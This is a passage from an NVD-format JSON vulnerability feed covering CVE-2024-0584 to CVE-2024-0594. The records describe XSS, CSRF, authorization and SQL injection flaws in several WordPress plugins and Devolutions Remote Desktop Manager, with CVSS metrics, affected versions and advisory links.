"cpe:2.3:o:linux:linux_kernel:6.7:rc2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.4", "versionEndExcluding" : "6.6.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0584", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: Do not use this CVE as it is duplicate of CVE-2023-6932" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-16T14:15Z", "lastModifiedDate" : "2024-02-14T06:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0585", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the Image URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "5.9.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0586", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Login/Register Element in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the custom login URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "5.9.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0587", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3024147/accelerated-mobile-pages/trunk/includes/disqus.html", "name" : "https://plugins.trac.wordpress.org/changeset/3024147/accelerated-mobile-pages/trunk/includes/disqus.html", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3024147/accelerated-mobile-pages/trunk/includes/disqus.html", "name" : "https://plugins.trac.wordpress.org/changeset/3024147/accelerated-mobile-pages/trunk/includes/disqus.html", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/85ca96a6-7992-424b-8b88-9a0751925223?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/85ca96a6-7992-424b-8b88-9a0751925223?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/85ca96a6-7992-424b-8b88-9a0751925223?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/85ca96a6-7992-424b-8b88-9a0751925223?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'disqus_name' parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ampforwp:accelerated_mobile_pages:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.92.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-23T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0588", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3058329/paid-memberships-pro/tags/3.0/includes/compatibility/lifterlms.php?old=2952976&old_path=paid-memberships-pro/trunk/includes/compatibility/lifterlms.php", "name" : "https://plugins.trac.wordpress.org/changeset/3058329/paid-memberships-pro/tags/3.0/includes/compatibility/lifterlms.php?old=2952976&old_path=paid-memberships-pro/trunk/includes/compatibility/lifterlms.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3058329/paid-memberships-pro/tags/3.0/includes/compatibility/lifterlms.php?old=2952976&old_path=paid-memberships-pro/trunk/includes/compatibility/lifterlms.php", "name" : "https://plugins.trac.wordpress.org/changeset/3058329/paid-memberships-pro/tags/3.0/includes/compatibility/lifterlms.php?old=2952976&old_path=paid-memberships-pro/trunk/includes/compatibility/lifterlms.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6fd87d34-2e7f-4c75-8816-b39820309077?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6fd87d34-2e7f-4c75-8816-b39820309077?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6fd87d34-2e7f-4c75-8816-b39820309077?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6fd87d34-2e7f-4c75-8816-b39820309077?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing nonce validation on the pmpro_lifter_save_streamline_option() function. This makes it possible for unauthenticated attackers to enable the streamline setting with Lifter LMS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2025-01-17T19:25Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0589", "ASSIGNER" : "security@devolutions.net" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://devolutions.net/security/advisories/DEVO-2024-0001/", "name" : "https://devolutions.net/security/advisories/DEVO-2024-0001/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://devolutions.net/security/advisories/DEVO-2024-0001/", "name" : "https://devolutions.net/security/advisories/DEVO-2024-0001/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Cross-site scripting (XSS) vulnerability in the entry overview tab in Devolutions Remote Desktop Manager 2023.3.36 and earlier on Windows allows an attacker with access to a data source to inject a malicious script via a specially crafted input in an entry.\n\n\n\n\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:devolutions:remote_desktop_manager:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2023.3.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-31T13:15Z", "lastModifiedDate" : "2025-06-09T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0590", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:clarity:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "0.9.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-03-04T12:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0591", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/", "name" : "https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/", "name" : "https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/samples/Basic/45_Quadratic_equation_solver.php", "name" : "https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/samples/Basic/45_Quadratic_equation_solver.php", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/samples/Basic/45_Quadratic_equation_solver.php", "name" : "https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/samples/Basic/45_Quadratic_equation_solver.php", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'A' parameter in all versions up to, and including, 3.4.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tms-outsource:wpdatatables:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.4.2.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-02-07T17:53Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0592", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/related-posts-for-wp/trunk/classes/hooks/class-hook-link-related-screen.php#L70", "name" : "https://plugins.trac.wordpress.org/browser/related-posts-for-wp/trunk/classes/hooks/class-hook-link-related-screen.php#L70", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/related-posts-for-wp/trunk/classes/hooks/class-hook-link-related-screen.php#L70", "name" : "https://plugins.trac.wordpress.org/browser/related-posts-for-wp/trunk/classes/hooks/class-hook-link-related-screen.php#L70", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3049719/related-posts-for-wp/tags/2.2.2/classes/hooks/class-hook-link-related-screen.php", "name" : "https://plugins.trac.wordpress.org/changeset/3049719/related-posts-for-wp/tags/2.2.2/classes/hooks/class-hook-link-related-screen.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3049719/related-posts-for-wp/tags/2.2.2/classes/hooks/class-hook-link-related-screen.php", "name" : "https://plugins.trac.wordpress.org/changeset/3049719/related-posts-for-wp/tags/2.2.2/classes/hooks/class-hook-link-related-screen.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Related Posts for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the handle_create_link() function. This makes it possible for unauthenticated attackers to add related posts to other posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This ultimately makes it possible for attackers to view draft and password protected posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.5 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T16:36Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0593", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php", "name" : "https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php", "name" : "https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Simple Job Board plugin for WordPress is vulnerable to unauthorized access of data| due to insufficient authorization checking on the fetch_quick_job() function in all versions up to, and including, 2.10.8. This makes it possible for unauthenticated attackers to fetch arbitrary posts, which can be password protected or private and contain sensitive information." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:presstigers:simple_job_board:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.11.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-21T07:15Z", "lastModifiedDate" : "2025-01-31T16:36Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0594", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L1279", "name" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L1279", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L1279", "name" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L1279", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765", "name" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765", "name" : "https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=", 